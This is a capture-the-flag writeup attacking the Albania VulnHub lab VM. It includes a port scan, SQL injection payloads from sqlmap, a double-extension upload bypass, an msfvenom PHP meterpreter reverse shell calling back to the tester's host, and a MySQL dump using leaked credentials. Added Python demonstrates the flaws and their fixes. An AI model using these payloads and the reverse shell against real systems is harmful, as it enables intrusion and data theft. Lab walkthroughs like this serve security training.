Albania VulnHub Writeup

  1. Service discovery
  2. Port 8008
  3. vulnbank
  4. I'll take it..
  5. Time to elevate
  6. What do we have here?
  7. Onwards and upwards
  8. Last steps
  9. Summary

I've got a bit of time on my hands, so I decided to check out the most recent VM released on VulnHub - Albania.

Service discovery

root@kali:~# nmap -T4 -A -v -p0-65535 192.168.110.101

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-12-03 06:29 EST
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:29
Completed NSE at 06:29, 0.00s elapsed
Initiating NSE at 06:29
Completed NSE at 06:29, 0.00s elapsed
Initiating ARP Ping Scan at 06:29
Scanning 192.168.110.101 [1 port]
Completed ARP Ping Scan at 06:29, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:29
Completed Parallel DNS resolution of 1 host. at 06:29, 0.02s elapsed
Initiating SYN Stealth Scan at 06:29
Scanning 192.168.110.101 [65536 ports]
Discovered open port 22/tcp on 192.168.110.101
Discovered open port 8008/tcp on 192.168.110.101
Completed SYN Stealth Scan at 06:29, 1.37s elapsed (65536 total ports)
Initiating Service scan at 06:29
Scanning 2 services on 192.168.110.101
Completed Service scan at 06:29, 6.02s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.110.101
NSE: Script scanning 192.168.110.101.
Initiating NSE at 06:29
Completed NSE at 06:29, 0.23s elapsed
Initiating NSE at 06:29
Completed NSE at 06:29, 0.00s elapsed
Nmap scan report for 192.168.110.101
Host is up (0.00033s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)
|_  256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HackDay Albania 2016
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.008 days (since Sat Dec  3 06:17:51 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.33 ms 192.168.110.101

NSE: Script Post-scanning.
Initiating NSE at 06:29
Completed NSE at 06:29, 0.01s elapsed
Initiating NSE at 06:29
Completed NSE at 06:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.77 seconds
           Raw packets sent: 65559 (2.885MB) | Rcvd: 65551 (2.623MB)

First I try connecting to SSH, to see if there is an interesting banner or welcome message for us.

Nope.. nothing. Moving swiftly on.

Port 8008

The nmap scan shows a number of entries in the robots.txt file.

Visiting the target in a browser results in the following page.

Putting the phrase in the popup into Google Translate results in the following. Unsurprisingly, it detects the language as Albanian.

Mirësevini (Welcome) [Close]
If I am, I know where to go ;)

Inspecting the source reveals the following comment.

<!--OK ok, por jo ketu :)-->

Turning to Google Translate again, it provides us with the following.

OK ok, but not here

Nothing much else to see in the response here.

Loading robots.txt gives us the following list.

Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

Most of these bring back a page with the following image.

This includes the following phrase.

A eshte kjo direktoria e duhur.

Apo po harxhoj kohen kot

This translates to the following (Google Translate garbles the second line; a closer rendering is given here).

Is this the right directory?

Or am I just wasting my time?

One directory that returns a different response is /unisxcudkqjydw/. We receive the following.

IS there any /vulnbank/ in there ???

Before moving on, I work through the rest of the links. Nothing else of interest comes back.

vulnbank

Visiting /unisxcudkqjydw/vulnbank/ brings back a directory listing, with a single entry - a directory named client. Browsing to this directory brings us to a login form.

Specifying the username as test'" and the password as ing'" returns us a PHP MySQL error.

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102

Time to get lazy, and fire sqlmap at the target.

After some experimentation, it appears that initially only the username field is injectable. A run with the default settings in sqlmap returns no vulnerabilities. I tweak the options to increase the risk and level parameters, and hit gold.

root@kali:~# sqlmap -u 192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/login.php --data "username=test*&password=ing" --threads 10 --random-agent --risk 3 --level 5
         _
 ___ ___| |_____ ___ ___  {1.0.9.1#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:48:53

[06:48:53] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[06:48:53] [INFO] testing connection to the target URL
[06:48:53] [INFO] testing if the target URL is stable
[06:48:54] [INFO] target URL is stable
[06:48:54] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[06:48:54] [WARNING] (custom) POST parameter '#1*' does not appear dynamic
[06:48:54] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[06:48:54] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[06:48:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:48:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[06:48:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[06:48:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[06:48:56] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[06:48:56] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment) (NOT)'
[06:48:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[06:48:57] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[06:48:57] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
[06:48:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[06:48:58] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[06:48:58] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[06:48:58] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --not-string="102")
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[06:49:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[06:49:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[06:49:04] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[06:49:04] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[06:49:04] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[06:49:04] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[06:49:04] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[06:49:04] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[06:49:04] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[06:49:04] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[06:49:04] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[06:49:05] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1125 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=test' RLIKE (SELECT (CASE WHEN (3909=3909) THEN 0x74657374 ELSE 0x28 END))-- IuTM&password=ing
---
[06:49:06] [INFO] testing MySQL
[06:49:06] [INFO] confirming MySQL
[06:49:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18, PHP 7.0.8
back-end DBMS: MySQL >= 5.0.0
[06:49:06] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.110.101'

[*] shutting down at 06:49:06

After more digging, it seems that sqlmap is not able to extract any information from the target.

I fall back to dirsearch and see if there are any other interesting directories about.

root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/ -e php

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 5151

Error Log: /root/dirsearch/logs/errors-16-12-03_06-53-57.log

Target: http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/

[06:53:57] Starting:
[06:53:57] 403 -  334B  - /unisxcudkqjydw/vulnbank/client/.ht_wsr.txt
[06:53:57] 403 -  327B  - /unisxcudkqjydw/vulnbank/client/.hta
[06:53:57] 403 -  336B  - /unisxcudkqjydw/vulnbank/client/.htaccess-dev
[06:53:57] 403 -  337B  - /unisxcudkqjydw/vulnbank/client/.htaccess.orig
[06:53:57] 403 -  338B  - /unisxcudkqjydw/vulnbank/client/.htaccess-local
[06:53:57] 403 -  338B  - /unisxcudkqjydw/vulnbank/client/.htaccess-marco
[06:53:57] 403 -  336B  - /unisxcudkqjydw/vulnbank/client/.htaccess.old
[06:53:57] 403 -  339B  - /unisxcudkqjydw/vulnbank/client/.htaccess.sample
[06:53:57] 403 -  337B  - /unisxcudkqjydw/vulnbank/client/.htaccess.bak1
[06:53:57] 403 -  336B  - /unisxcudkqjydw/vulnbank/client/.htaccess.BAK
[06:53:57] 403 -  337B  - /unisxcudkqjydw/vulnbank/client/.htaccess.save
[06:53:57] 403 -  336B  - /unisxcudkqjydw/vulnbank/client/.htaccess.txt
[06:53:57] 403 -  336B  - /unisxcudkqjydw/vulnbank/client/.htaccessOLD2
[06:53:57] 403 -  335B  - /unisxcudkqjydw/vulnbank/client/.htaccess_sc
[06:53:57] 403 -  338B  - /unisxcudkqjydw/vulnbank/client/.htaccess_extra
[06:53:57] 403 -  337B  - /unisxcudkqjydw/vulnbank/client/.htaccess_orig
[06:53:57] 403 -  335B  - /unisxcudkqjydw/vulnbank/client/.htaccessOLD
[06:53:57] 403 -  335B  - /unisxcudkqjydw/vulnbank/client/.htaccessBAK
[06:53:57] 403 -  333B  - /unisxcudkqjydw/vulnbank/client/.htaccess~
[06:53:57] 403 -  336B  - /unisxcudkqjydw/vulnbank/client/.htpasswd-old
[06:53:57] 403 -  331B  - /unisxcudkqjydw/vulnbank/client/.htgroup
[06:53:57] 403 -  333B  - /unisxcudkqjydw/vulnbank/client/.htpasswds
[06:53:57] 403 -  337B  - /unisxcudkqjydw/vulnbank/client/.htpasswd_test
[06:53:57] 403 -  331B  - /unisxcudkqjydw/vulnbank/client/.htusers
[06:54:02] 200 -    0B  - /unisxcudkqjydw/vulnbank/client/config.php
[06:54:02] 200 -    0B  - /unisxcudkqjydw/vulnbank/client/config.php
[06:54:03] 301 -  357B  - /unisxcudkqjydw/vulnbank/client/images  ->  http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/images/
[06:54:03] 302 -  627B  - /unisxcudkqjydw/vulnbank/client/index.php  ->  login.php
[06:54:03] 302 -  627B  - /unisxcudkqjydw/vulnbank/client/index.php/login/  ->  login.php
[06:54:04] 200 -  968B  - /unisxcudkqjydw/vulnbank/client/login.php
[06:54:04] 200 -  968B  - /unisxcudkqjydw/vulnbank/client/login.php
[06:54:07] 301 -  357B  - /unisxcudkqjydw/vulnbank/client/upload  ->  http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/upload/
[06:54:07] 200 -    0B  - /unisxcudkqjydw/vulnbank/client/upload/

Task Completed

Not much of interest in the images directory, apart from a troll image.

I run dirsearch against the upload directory (visiting it directly returns an empty page). No luck.. just a single hit for index.html.

Looks like we're going to have to succeed where sqlmap has failed.

Before giving up entirely on sqlmap, I note that it did not try any time-based blind attacks, so I re-run the above command with --technique T.

root@kali:~# sqlmap -u 192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/login.php --data "username=test*&password=ing" --threads 10 --random-agent --risk 3 --level 5 --technique T
         _
 ___ ___| |_____ ___ ___  {1.0.9.1#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:59:01

[06:59:01] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[06:59:02] [INFO] resuming back-end DBMS 'mysql'
[06:59:02] [INFO] testing connection to the target URL
[06:59:02] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[06:59:02] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[06:59:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[06:59:02] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[06:59:02] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[06:59:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[06:59:02] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[06:59:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[06:59:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[06:59:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[06:59:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[06:59:03] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[06:59:04] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[06:59:04] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[06:59:04] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[06:59:04] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
sqlmap got a 302 redirect to 'http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/index.php'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N]
[06:59:58] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[06:59:59] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 612 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind
    Payload: username=test' RLIKE SLEEP(5)-- smYE&password=ing
---
[07:01:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18, PHP 7.0.8
back-end DBMS: MySQL >= 5.0.12
[07:01:44] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.110.101'

[*] shutting down at 07:01:44

Looks hopeful.. I try retrieving some data, but no luck. What on earth is going on here?

I note that we were redirected to index.php when the payload fired. Let's try entering the generated payload, test' RLIKE SLEEP(5)-- smYE, as our username and see why we're being redirected to index.php.

Uhhhh, what? Well, I'm not sure why this worked, but I'll take it. I'm sure we'll find out what is going on later on.

I'll take it..

Nothing much of interest on here, but we are able to open a ticket, which comes complete with a file input field.

I try and upload a simple php script, but am met with the following error.

After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc...

Dag-nabbit. Ok, let's rename our test script to info.php.jpg and see what happens.

As part of testing, I also added an img tag to both text input fields. It appears that both fields are susceptible to XSS, which may come in handy later. It's also worth noting that my first ticket (the one where I tried to upload a PHP file) was still created, but the upload itself did not succeed.

Visiting my second ticket (where I uploaded a file named info.php.jpg), I check the URL for the uploaded asset.

http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=info.php.jpg

Upon visiting the URL, I'm presented with the output of phpinfo()! The file was executed by PHP, not served back as an image.
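
The extension-only filter above is the classic mistake: the name said .jpg, the bytes said PHP, and view_file.php evidently executed the file rather than serving it. The following is an added example, not code from the VM or from this writeup, showing a name-only check beside a hardened one that keys on the final extension, the file's magic bytes and the absence of a PHP open tag. The sample uploads (PHP_PROBE, JPEG_STUB) are constructed, and extension_only_check is my guess at what the ticket form does, since we never saw its source.

```python
import os
import secrets

# Constructed sample uploads (not files from the VM).
PHP_PROBE = b"<?php phpinfo(); ?>\n"
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32  # minimal JPEG/JFIF header

# Final extension -> magic bytes the body must start with.
ALLOWED_TYPES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "bmp":  (b"BM",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
}


def extension_only_check(filename):
    """The kind of check the ticket form appears to do (assumption: we never
    saw its code). It looks at the name and nothing else, so 'info.php.jpg'
    passes just like 'info.jpg' does."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED_TYPES


def validate_upload(filename, data):
    """Hardened check. Returns (accepted, reason).

    - only the final extension counts, and it must be on the allowlist
    - the body must start with the magic bytes for that type
    - no PHP open tag anywhere in the body (catches image/PHP polyglots)
    """
    base = os.path.basename(filename)  # drop any client-supplied path component
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP open tag"
    return True, "ok"


def stored_name(ext):
    """Server-chosen on-disk name: random, a single extension, never the client's name."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    print(extension_only_check("info.php.jpg"))                  # True: the bypass
    print(validate_upload("info.php.jpg", PHP_PROBE))            # (False, 'content does not match extension')
    print(validate_upload("info.php.jpg", JPEG_STUB + PHP_PROBE))  # (False, 'embedded PHP open tag')
    print(validate_upload("photo.jpg", JPEG_STUB))               # (True, 'ok')
```

Even the hardened check is secondary. The real fix is that a viewer script should never include() or eval an upload: store uploads outside the web root under the server-chosen stored_name(), stream them back with readfile() and a fixed Content-Type, and the double-extension trick has nothing left to execute.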

Time to elevate

So we've gained the ability to upload and execute PHP code on the target. Let's generate a metasploit payload.

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.103 LPORT=4444 -f raw > shell.php

I create a new ticket with this as the asset - then I go and startup a listener in metasploit for the payload.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter_reverse_tcp
PAYLOAD => php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.110.103
LHOST => 192.168.110.103
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.110.103:4444
[*] Starting the payload handler...

Finally, I trigger the payload by visiting http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.php.jpg

Just like magic..

[*] Meterpreter session 1 opened (192.168.110.103:4444 -> 192.168.110.101:41938) at 2016-12-03 07:25:01 -0500

What do we have here?

Time to figure out how the hell we logged in in the first place. I start a shell, and cat out the contents of login.php.

cat login.php
<?php

require("config.php");

echo header_template("SECURE Client Login");

if(isset($_POST['username'])){
    $ID = check_login($_POST['username'],$_POST['password']);

    if($ID >= 1){

        session_start();
        $_SESSION["id"] = $ID;
//        echo 'succes';
        header("Location: index.php");

    }else{

        echo invalid_login();

    }

}else{
    echo login();
}

?>

Ok - obviously the check_login function must be defined in config.php, so let's see what we've got. I cat out the contents of config.php, and find the check_login function.

function check_login($username,$password){



    $username = str_ireplace("OR", "", $username);
    $username = str_ireplace("UNION", "", $username);
    $username = str_ireplace("AND", "", $username);
    $password = str_ireplace("'","",$password);
    $sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
    $result = mysqli_fetch_assoc(execute_query($sql_query));
    $result = $result["ID"];
    if($result >= 1){
        return $result;
    }else{
        return -1;
        }


}

Ok - so sqlmap was unable to retrieve any data because the keywords OR, UNION and AND are stripped from the username, case-insensitively and from anywhere in the string, which also mangles identifiers such as ORD(), information_schema and password. The stripping is a single pass, though, so OORR survives as OR, which a default sqlmap run does not try. The username field is the only injectable parameter because the ' character is stripped from the password field.

Looking through the rest of the config.php file, we find the database credentials.

function execute_query($sql){


    $db_host = "127.0.0.1";
    $db_name = "bank_database";
    $db_user = "root";
    $db_password = "NuCiGoGo321";
//    echo $sql;
    $con=mysqli_connect($db_host,$db_user,$db_password,$db_name);
    if(mysqli_connect_errno()){
      echo "Failed to connect to MySQL: " . mysqli_connect_error();
      die(0);
      }
     $response = mysqli_query($con,$sql);
     mysqli_close($con);
     return $response;
}

I set up a port forward in our meterpreter session.

meterpreter > portfwd add -l 3306 -p 3306 -r 127.0.0.1
[*] Local TCP relay created: :3306 <-> 127.0.0.1:3306

I proceed to connect to the target mysql server.

root@kali:~# mysql -uroot -pNuCiGoGo321 -h127.0.0.1

The reason the RLIKE time-based payload logged us in is operator precedence. In MySQL, = and RLIKE sit at the same precedence level and associate left to right, so username = 'test' RLIKE SLEEP(5) is evaluated as (username = 'test') RLIKE SLEEP(5). SLEEP(5) returns 0 once it has slept, so for every row whose username is not test the left-hand side is 0, 0 RLIKE '0' is true, and the -- comment discards the password check. The query therefore returns every row (sleeping five seconds per row while it does so), and mysqli_fetch_assoc() hands back the first one:

mysql> SELECT ID FROM klienti where `username` = 'test' RLIKE SLEEP(5)-- smYE' and `password` = 'test';
+----+
| ID |
+----+
|  1 |
|  2 |
+----+

Therefore we are logged in as the user with ID 1, the first row returned.

Let's retrieve the rest of the entries from the database.

mysql> select * from klienti;
+----+------------+---------+---------+----------+------------+
| ID | emer       | mbiemer | bilanci | username | password   |
+----+------------+---------+---------+----------+------------+
|  1 | Charles D. | Hobson  |   25000 | hobson   | Charles123 |
|  2 | Jeffery    | Fischer |  120000 | jeff     | jeff321    |
+----+------------+---------+---------+----------+------------+
2 rows in set (0.00 sec)

So we've got a couple of user and password combinations for use later.

hobson:Charles123
jeff:jeff321
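
The two findings above, the single-pass keyword blacklist in check_login() and the = / RLIKE precedence quirk that makes the sqlmap payload match every row, can both be reproduced offline. The following is an added example, not code from the VM, using an in-memory SQLite table filled with constructed rows copied from the dump above. It assumes SQLite shares MySQL's rule that = and REGEXP (MySQL's RLIKE) sit at one precedence level and associate left to right, and, since SQLite has no SLEEP(), the payload uses the literal '0' that SLEEP(5) evaluates to. check_login_vulnerable is a port of the PHP, check_login_fixed the parameterised replacement.

```python
import re
import sqlite3

# Constructed rows mirroring the klienti table dumped from the VM (not live data).
SAMPLE_ROWS = [
    (1, "Charles D.", "Hobson", 25000, "hobson", "Charles123"),
    (2, "Jeffery", "Fischer", 120000, "jeff", "jeff321"),
]


def open_db():
    """In-memory SQLite stand-in for bank_database.

    SQLite has no built-in REGEXP operator; `x REGEXP y` calls the user
    function regexp(y, x), so we register one that behaves like RLIKE.
    """
    conn = sqlite3.connect(":memory:")
    conn.create_function(
        "regexp", 2,
        lambda pattern, value: 1 if re.search(str(pattern), str(value)) else 0,
    )
    conn.execute(
        "CREATE TABLE klienti (ID INTEGER, emer TEXT, mbiemer TEXT, "
        "bilanci INTEGER, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO klienti VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def php_str_ireplace(needle, replacement, haystack):
    """PHP's str_ireplace(): case-insensitive and a single left-to-right pass,
    so 'OORR' collapses to 'OR' rather than to nothing."""
    return re.sub(re.escape(needle), replacement, haystack, flags=re.IGNORECASE)


def check_login_vulnerable(conn, username, password):
    """Port of the VM's check_login(): keyword blacklist plus string concatenation."""
    for keyword in ("OR", "UNION", "AND"):
        username = php_str_ireplace(keyword, "", username)
    password = password.replace("'", "")
    sql = (f"SELECT ID FROM klienti where username = '{username}' "
           f"and password = '{password}'")
    try:
        row = conn.execute(sql).fetchone()  # first row only, like mysqli_fetch_assoc()
    except sqlite3.OperationalError:
        return -1  # the PHP app prints a mysqli warning here and shows the login form again
    return row[0] if row else -1


def check_login_fixed(conn, username, password):
    """Hardened version: a parameterised query and no keyword blacklist at all."""
    row = conn.execute(
        "SELECT ID FROM klienti WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else -1


def ids_matched_by(conn, username_payload):
    """Every ID the injected WHERE clause matches, i.e. what the mysql client showed us."""
    sql = (f"SELECT ID FROM klienti where username = '{username_payload}' "
           f"and password = 'test'")
    return [r[0] for r in conn.execute(sql)]


# sqlmap's payload was  test' RLIKE SLEEP(5)-- smYE ; SLEEP(5) returns 0, so the
# SQLite equivalent compares against the pattern '0'.
SQLMAP_STYLE_PAYLOAD = "test' REGEXP '0' -- smYE"
NAIVE_PAYLOAD = "' OR 1=1 -- "
DOUBLED_PAYLOAD = "' OORR 1=1 -- "

if __name__ == "__main__":
    db = open_db()
    print("naive  :", check_login_vulnerable(db, NAIVE_PAYLOAD, "x"))    # -1, the OR was stripped
    print("doubled:", check_login_vulnerable(db, DOUBLED_PAYLOAD, "x"))  # 1
    print("rlike  :", ids_matched_by(db, SQLMAP_STYLE_PAYLOAD))          # [1, 2]
    print("fixed  :", check_login_fixed(db, DOUBLED_PAYLOAD, "x"))       # -1
```

The naive ' OR 1=1 payload comes back as -1 because the OR is stripped and the query no longer parses, which is the mysqli warning we saw in the browser; the doubled ' OORR 1=1 version logs in as ID 1; the sqlmap-style payload matches both rows; and nothing gets through the parameterised query. A keyword blacklist like this only buys time, prepared statements remove the problem.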

Onwards and upwards

Let's see if there are any system users that share a username with the above login details.

ls -lah /home
total 12K
drwxr-xr-x  3 root   root   4.0K Oct  9 13:13 .
drwxr-xr-x 23 root   root   4.0K Oct 26 21:48 ..
drwxr-xr-x  4 taviso taviso 4.0K Oct 29 23:07 taviso

Damn, no such luck, but we do have a user called taviso, whose home directory is world-readable.

ls -alh /home/taviso
total 32K
drwxr-xr-x 4 taviso taviso 4.0K Oct 29 23:07 .
drwxr-xr-x 3 root   root   4.0K Oct  9 13:13 ..
-rw------- 1 root   root     17 Oct 29 23:07 .bash_history
-rw-r--r-- 1 taviso taviso  220 Oct  9 13:13 .bash_logout
-rw-r--r-- 1 taviso taviso 3.7K Oct  9 13:13 .bashrc
drwx------ 2 taviso taviso 4.0K Oct  9 13:16 .cache
drwxrwxr-x 2 taviso taviso 4.0K Oct 29 23:07 .nano
-rw-r--r-- 1 taviso taviso  655 Oct  9 13:13 .profile
-rw-r--r-- 1 taviso taviso    0 Oct 29 23:07 .sudo_as_admin_successful

So it looks like the taviso user might be in the sudo group: Ubuntu's sudo creates that file the first time an admin user runs it successfully.

grep taviso /etc/group
